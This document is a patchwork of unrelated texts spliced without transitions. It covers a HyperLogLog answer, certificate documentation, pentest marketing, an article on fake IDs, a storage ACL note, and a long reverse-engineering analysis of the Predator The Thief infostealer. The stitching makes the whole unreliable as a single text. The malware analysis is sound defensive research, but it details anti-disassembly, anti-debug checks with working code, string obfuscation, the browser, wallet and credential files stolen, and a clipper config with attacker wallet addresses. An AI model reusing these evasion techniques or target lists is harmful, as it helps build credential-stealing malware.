("Applications for cardinality estimation", too broad? I would like to add this simply as a comment but it won't fit.) I would suggest you turn to the numerous academic research on the subject; academic papers usually contain some information on "prior research on the subject" as well as "applications for which the subject has been used". You could start by traversing the references of interest in the following article:
- HyperLogLog: the analysis of a near-optimal cardinality estimation algorithm, by P. Flajolet et al.
... This problem has received a great deal of attention over the past two decades, finding an ever growing number of applications in networking and traffic monitoring, such as the detection of worm propagation, of network attacks (e.g., by Denial of Service), and of link-based spam on the web . For instance, a data stream over a network consists of a sequence of packets, each packet having a header, which contains a pair (source–destination) of addresses, followed by a body of specific data; the number of distinct header pairs (the cardinality of the multiset) in various time slices is an important indication for detecting attacks and monitoring traffic, as it records the number of distinct active flows. Indeed, worms and viruses typically propagate by opening a large number of different connections, and though they may well pass unnoticed amongst a huge traffic, their activity becomes exposed once cardinalities are measured (see the lucid exposition by Estan and Varghese in ). Other applications of cardinality estimators include data mining of massive data sets of sorts—natural language texts [4, 5], biological data [17, 18], very large structured databases, or the internet graph, where the authors of report computational gains by a factor of 500+ attained by probabilistic cardinality estimators.
At my work, HyperLogLog is used to estimate the number of unique users or unique devices hitting different code paths in online services. For example, how many users are affected by each type of service error? How many users use each feature? There are MANY interesting questions HyperLogLog allows us to answer.
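Redis ships HyperLogLog natively, which makes the "unique users per code path" use case above a one-liner per event. A minimal sketch, assuming a local Redis server and the redis-py client (the key names are placeholders):

import redis

r = redis.Redis()

# Record the user behind each error occurrence; duplicates are absorbed
r.pfadd("errors:timeout:users", "user:42", "user:7", "user:42")
r.pfadd("errors:500:users", "user:7")

# ~0.81% standard error, ~12 KB per key no matter how many users
print(r.pfcount("errors:timeout:users"))                      # approx. 2
print(r.pfcount("errors:timeout:users", "errors:500:users"))  # union, approx. 2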
Cybersecurity is becoming more and more important to our lives every day, and its role in modern healthcare is just one example of that importance. All of the terms related to cybersecurity can make learning more about it seem intimidating, but Xconomy has developed a helpful solution. On April 29, the site released a glossary of terms related to cybersecurity, defining everything from “advanced persistent threat” to “zero-day attack.” Did you know that a “worm” is “a type of malware that is standalone (unlike a virus, which is attached to another program) and spreads to other machines by replicating itself”? If not, you will know it after reading through this glossary! Click below for the story, courtesy of Xconomy.
This section contains links to common root SSL certificates used in The Things Stack, issued by trusted certificate authorities (CAs).
Which Certificate Is Right For My Deployment?
The complete certificate list contains all CA certificates trusted by modern browsers, so if you use certificates issued by a popular CA, you should be covered by this one. The minimal certificate list contains a tailored list of certificates used in standard The Things Stack deployments, for devices which do not support the larger list due to memory constraints. Unfortunately, some gateways do not support concatenated certificate lists at all. If your device will not connect using the complete or minimal certificate lists, you must use the specific certificate you use to configure TLS for your domain. If you use Let's Encrypt, use the Let's Encrypt ISRG Root X1.
Complete Certificate List
This .pem file contains all common CA certificates trusted by Mozilla, and is extracted and hosted by curl. Download the complete certificate list from curl here.
Minimal Certificate List for Common Installations
This .pem file contains certificates used in standard The Things Stack deployments, and is small enough to fit on memory-constrained devices such as gateways. This list includes the following CA certificates:
- ISRG Root X1
- Baltimore CyberTrust Root
- Amazon Root CA 1, 2, 3 and 4
- The Things Industries Root CA
Download the minimal certificate list here.
ISRG Root X1
Many The Things Stack deployments use the Let's Encrypt ISRG Root X1 Trust. If using Let's Encrypt to secure your domain, you may download the ISRG Root X1 Trust file here.
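Once a bundle is downloaded, pointing a TLS client at it instead of the system store is usually a one-line change. A minimal sketch, assuming the requests library, a locally saved bundle at ca.pem, and an example The Things Stack cluster hostname:

import requests

# verify= pins certificate validation to the downloaded CA bundle
response = requests.get(
    "https://eu1.cloud.thethings.network",  # example cluster; use your own
    verify="ca.pem",
)
print(response.status_code)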
Threat Modelling as a Preventive Approach
Threat modelling has earned a strong position in the cybersecurity industry as a well-known practice that provides a deeper understanding of the various threats and of the overall attack surface. By applying threat modelling to a cloud environment, organizations can understand their cloud architecture, the relevant threats, and the overall attack surface. This enables security teams to better understand the controls required to mitigate these threats and to manage their overall risk exposure. This white paper will highlight the most important steps for building a threat model for a cloud environment and establishing a scalable threat modelling process.
Host-Based Penetration Testing
With our host-based penetration testing services, NetSPI performs a deep dive review of baseline workstation and server images used to deploy systems to the corporate environment.
Improve security with host-based penetration testing by NetSPI
Standard network penetration testing engagements may not provide comprehensive insights into the vulnerabilities that exist in your baseline system images and Citrix-deployed desktops. During host-based penetration tests, NetSPI performs a deep dive review of baseline workstation and server images used to deploy systems to the corporate environment. The service includes testing of system drive encryption, group policy configurations, patch levels, service configurations, user and group roles, 3rd party software configurations, and more. It also includes a review of the systems and applications for common and known vulnerabilities. NetSPI supports host-based penetration testing of most Windows, Linux, z/OS, and macOS variations. Testing can be conducted against physical hardware, virtual machines, or virtual desktops.
The NetSPI Difference
NetSPI delivers industry-leading penetration testing expertise and a vulnerability management platform that makes penetration test results actionable. A collaborative team with experience and expertise produces the highest quality of work.
Types of Host-Based Penetration Testing Services
Host-Based Penetration Testing
During host-based penetration tests, NetSPI will conduct an assessment to evaluate the security of a standard system image. Testing is intended to identify vulnerabilities that have the potential to provide unauthorized access to systems, applications, and sensitive data. NetSPI supports host-based pentesting of most Windows, Linux, z/OS, and macOS variations. Testing may include the review of physical security controls, software security controls, user and group configurations, local access control configurations, local system configurations, local patch configurations, clear-text storage of passwords, and clear-text storage of sensitive data.
Virtual Desktop Penetration Testing
As the number of remote workers increases, it has become more challenging to manage physical workstations. As a result, many companies provide remote desktop access through virtualization platforms like Citrix and VMware. Those platforms can make it easy for remote employees, partners, and vendors to access what they need without as much overhead cost and management. However, with the ease of access come additional risks that don't have to be considered for laptops not typically accessible from the internet. During virtual desktop penetration tests, NetSPI will identify vulnerabilities that provide unauthorized access to the operating system through desktops published via virtualization platforms like Citrix and VMware. Additionally, NetSPI will review the system configuration to identify vulnerabilities that could be used to escalate privileges, pivot into the internal environment, or exfiltrate sensitive data.
Virtual Application Penetration Testing and Breakout Assessments
It has become common for companies to make their traditional desktop applications accessible from the internet by publishing them through virtualization platforms like Citrix or VMware. Those platforms make it easy for remote employees, partners, and vendors to access existing desktop applications without requiring the large investment that comes with rewriting legacy apps for the web.
However, with the ease of access come additional risks that don't have to be considered for desktop applications living behind a firewall. During virtual application penetration tests, NetSPI will identify the risks specific to applications published through virtualization platforms, along with traditional application testing, to help ensure that your company stays safe while adapting to evolving business needs. During virtual application breakout assessments, NetSPI will identify vulnerabilities that provide unauthorized access to the operating system through applications published via virtualization platforms like Citrix and VMware.
Benefits of Penetration Testing
Pentest your applications to:
- Meet network security testing requirements from a third party
- Learn how to strengthen your network security program
- Augment your team
- Get a fresh set of eyes from penetration testing experts
In today's digital world, the implications of fake IDs extend beyond physical documents used to misrepresent one's identity. With the rise of online activities and transactions, fake IDs have become a significant component in various cybersecurity threats. This article explores the role of fake IDs in the context of cybersecurity, outlining the challenges they pose and the strategies needed to mitigate these risks.
Facilitating Online Identity Fraud
One of the primary roles of fake IDs in cybersecurity threats is facilitating online identity fraud. Cybercriminals use fake IDs to create bogus online accounts, apply for loans, or carry out transactions under a false identity. This not only affects individuals whose identities are stolen but also businesses and financial institutions that become victims of fraud.
Impact on Data Security and Privacy
Fake IDs can be used to bypass security measures in place to protect data privacy. By assuming a legitimate identity, attackers can gain unauthorized access to personal and corporate data. This can lead to data breaches, exposing sensitive information such as financial details, personal records, and confidential business information.
Challenges in Authentication and Verification
The presence of fake IDs in the digital realm poses significant challenges to online authentication and verification processes. Traditional verification methods may not be sufficient to detect counterfeit identities, necessitating more robust and sophisticated authentication mechanisms. The challenge is to implement these mechanisms without overly complicating legitimate user access or infringing on privacy.
Use in Phishing and Social Engineering Attacks
Fake IDs contribute to the effectiveness of phishing and social engineering attacks. Cybercriminals often use fake identities to build trust and deceive individuals or employees into divulging confidential information or granting access to restricted systems. This underscores the need for heightened awareness and education about these types of cybersecurity threats.
Deepfakes and AI-Generated Fake IDs
Advancements in AI have led to the creation of deepfakes – highly realistic and convincing digital representations of real people. These technologies can be used to generate fake IDs that are incredibly difficult to distinguish from real ones, posing new challenges to identity verification in both physical and digital domains.
Strategies for Mitigation
To combat the role of fake IDs in cybersecurity threats, a multi-layered approach is necessary:
- Enhanced Verification Methods: Implementing advanced verification methods, such as biometric authentication and multi-factor authentication, can help in accurately identifying fake IDs.
- Continuous Monitoring: Regular monitoring of online transactions and activities can help in quickly identifying and responding to suspicious activities linked to fake IDs.
- Public Awareness and Training: Educating the public and employees about the risks associated with fake IDs and common tactics used by cybercriminals is essential in preventing successful attacks.
- Collaboration and Information Sharing: Collaboration between businesses, cybersecurity experts, and law enforcement can facilitate the sharing of information about emerging threats and counterfeit ID techniques.
The role of fake IDs in modern cybersecurity threats is a complex issue that requires vigilant attention and proactive measures.
As technology continues to advance, the strategies to detect and mitigate these threats must evolve correspondingly. By understanding the risks and implementing effective strategies, it is possible to reduce the impact of fake IDs on cybersecurity and protect both individuals and organizations from these evolving threats.
Access rights are consistently enforced across access protocols on all security models. A user is granted or denied the same rights to a file whether using SMB or NFS. Clusters running OneFS support a set of global policy settings that enable you to customize the default access control list (ACL) and UNIX permissions settings. OneFS is configured with standard UNIX permissions on the file tree. Through Windows Explorer or OneFS administrative tools, you can give any file or directory an ACL. In addition to Windows domain users and groups, ACLs in OneFS can include local, NIS, and LDAP users and groups. After a file is given an ACL, the mode bits are no longer enforced and exist only as an estimate of the effective permissions.
Whenever I reverse a sample, I am mostly interested in how it was developed. Even if, in the end, the techniques employed are generally the same, I am always curious about the way a task was achieved, or I simply want to understand the code philosophy of a piece of code. It is a very nice way to spot different trends and (sometimes) discover new tricks that you never knew were possible. This is one of the main reasons I love digging mostly into stealers/clippers: they are accessible to reverse, and I enjoy malware analysis as a kind of game (with some exceptions, like Nymaim, which is literally hell). It's been a year and a half now since I started looking into "Predator The Thief", and this malware has evolved over time in terms of content added and code structure. This impression could differ from others' in terms of the stealing tasks performed, but based on my first in-depth analysis, the code has changed so much that another post on it was necessary. This one will focus on some major aspects of the 3.3.2 version, but will not explain everything (some details have already been covered in other papers, and some subjects are known). Also, from time to time I will add some extra commentary about malware analysis in general.
When you open an unpacked binary in IDA or another disassembler such as GHIDRA, some of the code is not interpreted correctly, which leads to rubbish code, the inability to construct instructions, or no graph view at all. Behind this, it's obvious that an anti-disassembly trick is used. The technique exploited here is known and used in the wild by other malware; it requires just a few opcodes and leads, in the end, to the creation of a false branch. In this case, it begins with a simple XOR instruction that sets up the zero flag, forcing the JZ jump condition to always be taken, so at this stage it's already understandable that something suspicious is in progress. Then the MOV opcode (0xB8) next to the jump is a 5-byte instruction that tricks the disassembler into treating it as the instruction to interpret, even though the correct opcode is hidden inside it; by following this wrong path, the disassembler ends up hiding the malicious tasks. Of course, fixing this issue is simple and requires just a few seconds. For example, with IDA you need to undefine the MOV instruction by pressing the keyboard shortcut "U", to produce this pattern. Then skip the 0xB8 opcode and press "C" at the 0xE8 position to make the disassembler interpret an instruction at that point. Replacing the 0xB8 opcode with 0x90 in a hexadecimal editor will fix the issue for good (a small patching sketch follows below). Opening the patched PE again, you will see that IDA is now able to show even the graph mode. After patching, there are still some parts that can't be correctly parsed by the disassembler, but after reading some of the code locations, some of them are correct; so if you want to create a function, you can select the "loc" section and press "P" to create a sub-function. Of course, this action could lead to something irreversible if you are not sure about what you are doing, and you may end up having to restart the whole patching process, so it should be done only as a last resort.
Whenever you are analyzing Predator, you know that you will have to deal with obfuscation tricks almost everywhere, placed just to slow down your code analysis.
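The manual fix above can also be scripted. A rough sketch, assuming the stub is the byte sequence XOR EAX,EAX / JZ +1 / 0xB8 (33 C0 74 01 B8); the exact bytes vary between samples, so both the pattern and the file names are assumptions to adapt, not a rule. With the binary cleaned up, back to those obfuscation tricks.

from pathlib import Path

STUB = bytes.fromhex("33c07401b8")  # xor eax,eax / jz over the junk / 0xB8

data = bytearray(Path("predator_unpacked.bin").read_bytes())
offset, patched = 0, 0
while (offset := data.find(STUB, offset)) != -1:
    data[offset + 4] = 0x90  # NOP out the junk MOV opcode
    patched += 1
    offset += len(STUB)

Path("predator_patched.bin").write_bytes(data)
print(f"patched {patched} stub(s)")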
Of course, they are not complicated to assimilate, but as always, simple tricks used at their finest can turn a simple fun afternoon into, literally, "welcome to Dark Souls". The concept was already there in the first in-depth analysis of this malware, and the idea has remained the same through the further updates. The only differences are easy to guess:
- More layers of obfuscation have been added
- Techniques already used have just been adjusted
- A bigger dose of randomness
From a reversing point of view, I consider this part one of the main ways to recognize this stealer. Even if, of course, you can use network communication and C&C patterns as other ways of identifying it, inspecting the code is one way to clear up doubts (and I understand that this statement certainly does not work for every malware). The idea is that nowadays it's incredibly easy to make mistakes by being duped by rules or tags on sandboxes, due to similarities that come from code sharing, or by literal false flags.
Already covered in a previous analysis, recreating GetProcAddress is a popular trick to hide an API call behind a simple register call. Over the updates, the main idea has stayed the same, but the main procedures have been modified, reworked, or slightly optimized. First of all, you easily recognize the PEB being retrieved by spotting fs[0x30] behind some extra instructions, then from it the loader data section is requested for two things:
- Getting the InLoadOrderModuleList pointer
- Getting the InMemoryOrderModuleList pointer
For those who are unfamiliar with this: the PEB_LDR_DATA structure is where all the information related to the loaded modules of the process is stored. Then a loop performs a basic search on every entry of the module list (in "memory order") in the loader data: it retrieves the module name and generates a hash of it, which is then compared with a hardcoded, obfuscated hash of the kernel32 module. Obviously, if it matches, the module base address is saved; if not, the process is repeated again and again. Nowadays, using hashes for function or module names is something you can see in many other malware; the purposes are multiple, and this is one way to hide some actions. An example of this code behavior can easily be found on the internet, and as I said above, this trick is popular and already widely used.
GetProcAddress / GetLoadLibrary
Always paired with GetModuleAddress, the code for recreating GetProcAddress follows by far the same architecture model as in v2, in terms of the concept used. If the function is forwarded, it will basically perform a recursive call of itself: getting the forward address, checking whether the library is loaded, then calling GetProcAddress again with the new values. It's almost unnecessary to talk about it, but for an in-depth analysis, if you have never read the other article before, it's always worth saying a few words on the subject (as a reminder). The XOR encryption is a common cipher that requires only a rudimentary implementation to be effective:
- Only one operator is used (XOR)
- It's not resource-consuming
- It could be used as a component of other ciphers
This cipher is extremely popular in malware, and the goal is not really to produce strong encryption, because it's ridiculously easy to break most of the time; it is used for hiding information or keywords that could trigger alerts or rules…
- Communication between host & server
- Hiding strings
- Or… simply used as an absurd step for obfuscating the code
A typical example in Predator is huge blocks with only two instructions (XOR & MOV), where stack strings are decrypted X bytes at a time by just moving content into a temporary value (stored in EAX), XORing it, then pushing it back to EBP, with the principle reproduced endlessly, again and again. This is rudimentary; in this scenario, it's just part of the obfuscation process heavily abused by Predator, producing an absurd amount of instructions for simple things. Also, in some cases, when a hexadecimal/integer value is required for an API call, it's possible to spot another pattern: a hardcoded string is moved to a register, then a single XOR instruction reveals the correct value. This trivial trick is used for specific cases like the correct position in the TEB for retrieving the PEB, the RVA of a specific module, …
Finally, the most common one is the classic for loop with a single-byte XOR key, seen decrypting modules, functions, and other things…

data = bytearray(...)        # encrypted bytes (placeholder)
key = data[len(data) - 1]    # the last byte serves as the XOR key
for i in range(len(data)):
    data[i] ^= key

Let's consider this a perfect example of "let's do the exact same thing by just changing one single instruction": in the end, a new encryption method is used with no development effort. That's how a SUB instruction is used to implement the substitution cipher. The only difference I could notice is how the key is retrieved. Instead of something hardcoded directly, a signed 32-bit division is performed, easily noticeable by the use of the cdq & idiv instructions, and then the dl register (the remainder) is used for the substitution.
What's the result in the end? Merging these obfuscation techniques leads to a nonsensical amount of instructions for a basic task, which will obviously burn some hours of analysis if you don't take the time to clean up that mess a bit, with the help of some scripts or whatever other ideas come to your mind. It would be nice to see, one of these days, some scripts released by the community.
There are plenty of techniques abused here that were not in the first analysis; it's no longer a simple PEB.BeingDebugged or a check for a virtual machine, so let's dig into them one by one, except CheckRemoteDebugger, which is simple enough to understand by itself :')
This is one of the oldest tricks in Windows, and it still does its work after all these years. Basically, in a very simple way (because there is a lot happening during the process), NtSetInformationThread is called with a value (0x11) obfuscated by a XOR operator. This parameter is a ThreadInformationClass with a specific enum called ThreadHideFromDebugger, and once it's executed, the debugger is not able to catch any debug information. The thread handle points, of course, to the malware's own thread, and when you are analyzing it with a debugger, the call effectively detaches it.
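This trick is easy to reproduce when testing detection or TitanHide-style countermeasures. A minimal ctypes sketch (Windows only; run it inside a disposable analysis VM, since the current thread really does vanish from an attached debugger):

import ctypes

ntdll = ctypes.windll.ntdll
kernel32 = ctypes.windll.kernel32

THREAD_HIDE_FROM_DEBUGGER = 0x11  # the ThreadInformationClass value hidden behind the XOR

status = ntdll.NtSetInformationThread(
    kernel32.GetCurrentThread(),  # pseudo-handle to the calling thread
    THREAD_HIDE_FROM_DEBUGGER,
    None,                         # this information class takes no input buffer
    0,
)
print(f"NTSTATUS: {status & 0xFFFFFFFF:#010x}")  # 0 means success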
Inside WinMain, a huge function is called with a lot of consecutive anti-debug tricks, almost all of them indirectly related to techniques patched by TitanHide (or strongly resembling them). The first one performed is really basic, but pretty efficient at its task. Basically, when CloseHandle is called with a non-existent or invalid handle, it raises an exception, and whenever you have a debugger attached to the process, it will not like that at all. To guarantee that this is not an issue during normal execution, a simple __try / __except construct is used, so when this API call is made outside a debugger, execution safely reaches the end without any issue. The invalid handle used here is a static one, in l33t code, with the value 0xBAADAA55, and it bores me as much as this face. That's no surprise to see from the malware developer: inside jokes, l33t values, anime references, and probably other content that I missed are usual things to spot in Predator.
When you are debugging a process, Microsoft Windows creates a "Debug" object and a handle corresponding to it. To check whether this object exists for the process, NtQueryInformationProcess is used with the ProcessInfoClass set to 0x1e (which is, in fact, ProcessDebugObjectHandle). In this case, the NTSTATUS value returned by the API call is an error with the ID 0xC0000353, aka STATUS_PORT_NOT_SET. This means: "An attempt to remove a process's DebugPort was made, but a port was not already associated with the process." The anti-debug trick is simply to verify whether this error is there; that's all.
This next one may be considered pretty wild if you are not familiar with hardware breakpoints. There are registers called debug registers, which use the DRx nomenclature (DR0 to DR7). When GetThreadContext is called, the function retrieves all the context information from a thread. For those not familiar with a context structure: it contains all the register data of the corresponding element. So, with this data in hand, the malware only needs to check whether those DRx registers are initialized with a value not equal to 0. In the case here, it's easy to spot that 4 registers are checked:
if (ctx->Dr0 != 0 || ctx->Dr1 != 0 || ctx->Dr2 != 0 || ctx->Dr3 != 0)
Int 3 breakpoint
int 3 (or Interrupt 3) is a popular opcode used to force the debugger to stop at a specific offset. As said in the title, this is a breakpoint, but if it's executed without any debugging environment, the exception handler is able to deal with this behavior and execution continues without any issue. Unless I missed something, that is the scenario here. By the way, in another scenario involving int 3, the number of times this specific opcode is triggered can also be used as an incremented counter: if the counter goes above a specific value, a simplistic condition is sufficient to detect execution inside a debugger that way.
With all the techniques explained above, everything leads, in the end, to a final condition step, if of course the debugger hasn't crashed. The checking task is pretty easy to understand, and it comes down to a simple operation: a value is set in EAX during the anti-debug function; if everything is correct, this register is set to zero, and if not, we can see all the different values that are possible.
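The debug-object check above is also straightforward to replicate from a script when triaging samples or validating a sandbox. A minimal ctypes sketch (Windows only):

import ctypes
from ctypes import byref, sizeof, wintypes

ntdll = ctypes.windll.ntdll
kernel32 = ctypes.windll.kernel32

ProcessDebugObjectHandle = 0x1E
STATUS_PORT_NOT_SET = 0xC0000353  # "no debug object" means no debugger

debug_handle = wintypes.HANDLE()
status = ntdll.NtQueryInformationProcess(
    kernel32.GetCurrentProcess(),
    ProcessDebugObjectHandle,
    byref(debug_handle),
    sizeof(debug_handle),
    None,
)
if (status & 0xFFFFFFFF) == STATUS_PORT_NOT_SET:
    print("no debug object: likely not being debugged")
else:
    print("debug object present (or unexpected status): debugger suspected")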
…And when the anti-debug function is done, the register EAX is checked with the TEST operator, so the ZF flag determines whether execution enters the most important loop, the one containing the main function of the stealer. The anti-VM is presented as an option in Predator and is performed just after the first C&C request. The tricks used are pretty old, basically relying on anti-VM instructions:
- CPUID (hypervisor trick)
Curiously, this option is not performed by default if the C&C is not reachable.
Paranoid & Organized Predator
When entering the "big main function", the stealer performs "again" extra validations: that you have a valid payload (and not a modded one), that you are running it correctly, and, once more, that you are not analyzing it. This kind of paranoid checking step is a result of the multiple cracked builders developed and released in the wild (mostly or exclusively coming, at one time, from XakFor.Net). It is pretty wild and fun to see anti-piracy protocols showing up in the malware landscape. Then the malware performs a classically organized setup for all the requested actions, which can be represented in that way. Of course, as usual and as already explained a bit in the first paper, the C&C domain is retrieved from a table of function pointers before the execution of the WinMain function (where the payload starts doing its tasks). You can easily see all the functions that will be called between the starting location (__xc_a) and the ending location (__xc_z). Then you can easily spot the XOR strings that hide the C&C domain, as in the usual old Predator malware.
Data Encryption & Encoding
Besides using XOR almost absolutely everywhere, this info stealer uses a mix of RC4 encryption and base64 encoding whenever it receives data from the C&C. Without specialized tools or paid versions of IDA (or whatever other software), it can be a bit challenging to recognize (when you are a junior analyst), due to modifications in some parts of the code. The Base64 functions are extremely easy to spot, given the symbol values in the registers before and after the calls. The only thing to notice is that they use a typical signature… a whole block of XOR stack strings; I believe this trick is designed to hide an eventual Base64 alphabet from some Yara rules. Other than that, the rest of the code remains identical to standard base64 algorithms.
For RC4, things can be a little messy if you are not familiar with encryption algorithms in a disassembler/debugger; in some cases it can be hell, in some cases not. Here, it is, in fact, this amount of code to perform the process. The blocks represent the generation of the array S, then the Key-Scheduling Algorithm (KSA) using a specific secret key that is, in fact, the C&C domain (if there is no domain but a hardcoded IP, that IP is the secret key), and the last one is the Pseudo-Random Generation Algorithm (PRGA). For more info, some resources about this algorithm are below:
Mutex & Hardware ID
The Hardware ID (HWID) and mutex are related, and their generation is quite funky, I would say. Even if most people consider this not important to investigate, I love small details in malware; even if their role is maybe meaningless, for me every detail counts, no matter what (even the stupidest one). Here the hardware ID generation is split into 3 main parts. I had a lot of fun understanding how this one is created.
First, it grabs all the available logical drives on the compromised machine, and for each of them the serial number is saved into a temporary variable; whenever a new drive is found, its hexadecimal value is added to it. So basically, if two drives have the serial numbers "44C5-F04D" and "1130-DDFF", ESI will receive 0x44C5F04D and then add 0x1130DDFF. When that's done, this value is put into a while loop that divides the value in ESI by 0xA and saves the remainder into another temporary variable; the loop breaks when ESI is below 1. Then the result of this operation is saved and duplicated, with its last 4 bytes appended to itself (i.e., 1122334455 becomes 112233445522334455). If this is not sufficient, the value is put into another loop performing this operation:

hwid = ...                       # the digits computed above, as bytes
result = ""
for i, s in enumerate(hwid):
    if i & 1:
        result += chr(s + 0x40)  # every other digit is shifted into the letter range
    else:
        result += chr(s)

It results in the creation of an alphanumeric string that will be the archive filename used during the POST request to the C&C. But wait! There is more… This value is also part of the creation of the mutex name: a simple base64 operation on it, plus some bitwise operations that cut part of the base64 string, finally produce the mutex name!
A classic thing in malware: this feature is used to avoid infecting machines from the Commonwealth of Independent States (CIS), using a simple API call, GetUserDefaultLangID. The value returned is the language identifier of the user's region format setting, and it is checked against a list of specific language identifiers; of course, as in every other situation, all the tested values are encrypted.
Language ID | SubLanguage Symbol | Country
Files, files where are you?
When I reversed this stealer for the first time, files and the malicious archive were stored on the disk and then deleted. But right now, this is not the case anymore: Predator manages all the stolen data in memory, to avoid as much as possible any extra traces during execution. Predator nowadays creates in memory a lot of allocated pages and temporary files that are used for interactions with the real files existing on disk. Most of the time it's basically getting handles and sizes, then doing some operations for opening files, grabbing content, and saving it to a place in memory. This explanation is summarized in a "very" simplified way, because there are a lot of cases and scenarios to manage. Another point to notice is that the archive (using ZIP compression) is also created in memory from the selected folders/files. That doesn't mean the whole file architecture is different; it's the same format as before.
After explaining so many times how this stuff works, the fundamental idea is boringly the same for every stealer:
- Analyzing (optional)
- Parsing (optional)
What differs behind that is how they obfuscate the files or values to check… and guess what… every malware has its specialties (whenever they haven't decided to copy the same piece of code from GitHub or from whatever generic .NET stealer), and in the end there is no black magic, just a simple (or complex) enigma to solve. As a malware analyst, when you are starting to analyze stealers, you literally want to understand everything, because everything is new; with time, you realize how the routine performed to fetch the data works, and how stupidly well it works (as a reminder, it might not always be that easy for some highly specific stuff).
In the end, you just want to know the targeted software, and only dig into those you haven't seen before, but every time the approach is the same:
- Dumbly checking a path
- Checking a registry key to get the correct path of a piece of software
- Checking a shortcut path based on an icon
Besides that, Predator the Thief steals a lot of different things:
- Grabbing content from browsers (cookies, history, credentials)
- Harvesting/fetching credit cards
- Stealing sensitive information & files from crypto-wallets
- Credentials from FTP software
- Data coming from instant communication software
- Data coming from messenger software
- 2FA authenticator software
- Fetching gaming accounts
- Credentials coming from VPN software
- Grabbing specific files (also dynamically)
- Harvesting all the information from the computer (specs, software)
- Stealing the clipboard (if there is some content during its execution)
- Taking a picture of you (if your webcam is connected)
- Taking a screenshot of your desktop
- It could also include a clipper (as a modular feature)
- And… due to the module manager, other tasks that I still haven't mentioned here (and that I also don't know about)
Let's explain just some of them that I found worth digging into. Since my last analysis, things have changed for the browser part, and it's now divided into three major parts:
- Internet Explorer is analyzed in a specifically developed function, because the data is contained in a "Vault", so a specific Windows API is required to read it.
- Microsoft Edge is also split into another part of the stealing process, because it uses unique files and needs some specific parsing tasks.
- Then, the other browsers are fetched by using a homemade static grabber.
Grabber n°1 (The generic one)
It's pretty fun to see that the stealing process uses a single function for catching a lot of things. This generic grabber is pretty "clean" compared to what I saw before; even if there is no magic at all, it's sufficient to do enough damage, using a recursive loop at a specific place that searches for all the required files & folders. Comparing with older versions of Predator: when it attempted to steal content from browsers and some wallets, it checked, step by step, specific directories or registry keys, then went through loops and tasks for fetching the credentials. Nowadays, this step has been removed (for the browser part) and is now part of this raw grabber that parses everything starting from the %USERS% directory. As usual, all the variables containing the required files are obfuscated and encrypted with a simple XOR algorithm, and in the end this is the "static" list the info stealer focuses on:
Login Data | Chrome / Chromium based | Copy & Parse
Cookies | Chrome / Chromium based | Copy & Parse
Web Data | Browsers | Copy & Parse
History | Browsers | Copy & Parse
formhistory.sqlite | Mozilla Firefox & Others | Copy & Parse
cookies.sqlite | Mozilla Firefox & Others | Copy & Parse
wallet.dat | Bitcoin | Copy & Parse
.sln | Visual Studio Projects | Copy filename into Project.txt
main.db | Skype | Copy & Parse
logins.json | Chrome | Copy & Parse
signons.sqlite | Mozilla Firefox & Others | Copy & Parse
places.sqlite | Mozilla Firefox & Others | Copy & Parse
Last Version | Mozilla Firefox & Others | Copy & Parse
Grabber n°2 (The dynamic one)
There is a second grabber in Predator The Thief, and it is not only used when a config is available in memory from the first request made to the C&C.
In fact, it's also used as part of the process of searching & copying critical files coming from wallet software, communication software, and others… The "main function" of this dynamic grabber requires only three arguments:
- The path where you want to search for files
- The requested file or mask
- The path where the found files will be put in the final archive sent to the C&C
When the grabber is configured for a recursive search, it simply adds the value ".." at the end of the path and checks whether the next file is a folder, to enter the same function again and again. In the end, fundamentally, this is almost the same pattern as the first grabber, the only difference being that in this case there is no in-depth parsing/analyzing of files. It's simply this sequence:
- Find a matching file based on the requested search
- Create an entry in the stolen-archive folder
- Set a handle/pointer to the grabbed file
- Save the whole content to memory
Of course, there are a lot of particular cases to take into consideration here, but the main idea is like this (a rough model is sketched at the end of this section).
What is Predator stealing in the end? If we exclude the dynamic grabber, this is the current list (for 3.3.2) of the kinds of software impacted by this stealer. For sure, it's hard to know precisely, on the browser side, all the ones impacted, due to the generic grabber, but the most important ones are listed here:
- Authy (Inspired by Vidar)
- Battle.net (Inspired by Kpot)
- Mozilla Firefox (also Gecko browsers using the same files)
- Chrome (also Chromium browsers using the same files)
- Internet Explorer
- Unmentioned browsers using the same files detected by the grabber
Also, besides stealing, other actions are performed, like:
- Taking a webcam picture capture
- Taking a desktop screenshot
There are currently 4 kinds of loaders implemented in this info stealer. For all the cases, I have explained below (in another part of this analysis) what the options of each technique are. There is no magic; there is nothing more to explain about this feature these days, as there are enough articles and tutorials that talk about it. The only thing to notice is that Predator is designed to load the payload in different ways, through a simple process creation or by abusing some process injections (on this part, I recommend reading the work from Endgame).
Something really interesting about this stealer these days is that it developed a feature for adding additional tasks as part of a module/plugin package. Maybe this thing is wrongly named (I will probably be corrected soon about this statement), but now it's definitely sure that we can consider this malware a modular one. When decrypting the config from check.get, you can quickly understand that a module will be launched by looking at the last entry… This will be the name of the module that will be requested from the C&C (this is also the easiest way to spot a new module). The first request gives you the config of the module (in my case it was like this); it's saved but NOT decrypted (it looks like this part is dealt with by the module itself). The other request is focused on downloading the payload, decrypting it, and saving it to disk in a random folder in %PROGRAMDATA% (the filename is also generated randomly); when that's done, it's simply executed by ShellExecuteA. Another thing to notice: it's designed to launch multiple modules/plugins.
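For reference, here is a rough Python model (an analyst's mental model, not Predator's actual code) of the three-argument grabber routine described above:

import fnmatch
import os

def grab(search_path, mask, archive_dir, recursive=True):
    # Returns (file on disk, destination inside the archive) pairs
    hits = []
    for root, _dirs, files in os.walk(search_path):
        for name in fnmatch.filter(files, mask):
            hits.append((os.path.join(root, name), archive_dir))
        if not recursive:
            break  # only the top-level directory when recursion is off
    return hits

# e.g. a config entry along the lines of "%userprofile%\Documents | *.txt | files"
print(grab(os.path.expanduser("~/Documents"), "*.txt", "files"))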
Clipper (Optional module)
The clipper is one example of a module that can be loaded by the module manager. As far as I saw, this is the only one (maybe there are other things, maybe not; I don't have the visibility for that). Disclaimer: before people get mistaken, the clipper is proper to Predator the Thief, and this is NOT something coming from another actor (if that were the case, the loader part would be used). This malware module is developed in C++, and as with Predator itself, you easily recognize the obfuscation proper to it (stack strings, XOR, SUB, code spaghetti, recreated GetProcAddress…). Well, everything you love for slowing down your analysis yet again. As already detailed a little above, the module is designed to grab the config from the main program, decrypt it, and start the process routine indefinitely:
- Open the clipboard
- Check the content based on the loaded config
- If something matches, put in the malicious wallet
The clipper config is rudimentary, using "|" as a delimiter: mask/regex on the left, malicious wallet on the right.
1*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H|
3*:1Eh8gHDVCS8xuKQNhCtZKiE1dVuRQiQ58H|
0x*:0x7996ad65556859C0F795Fe590018b08699092B9C|
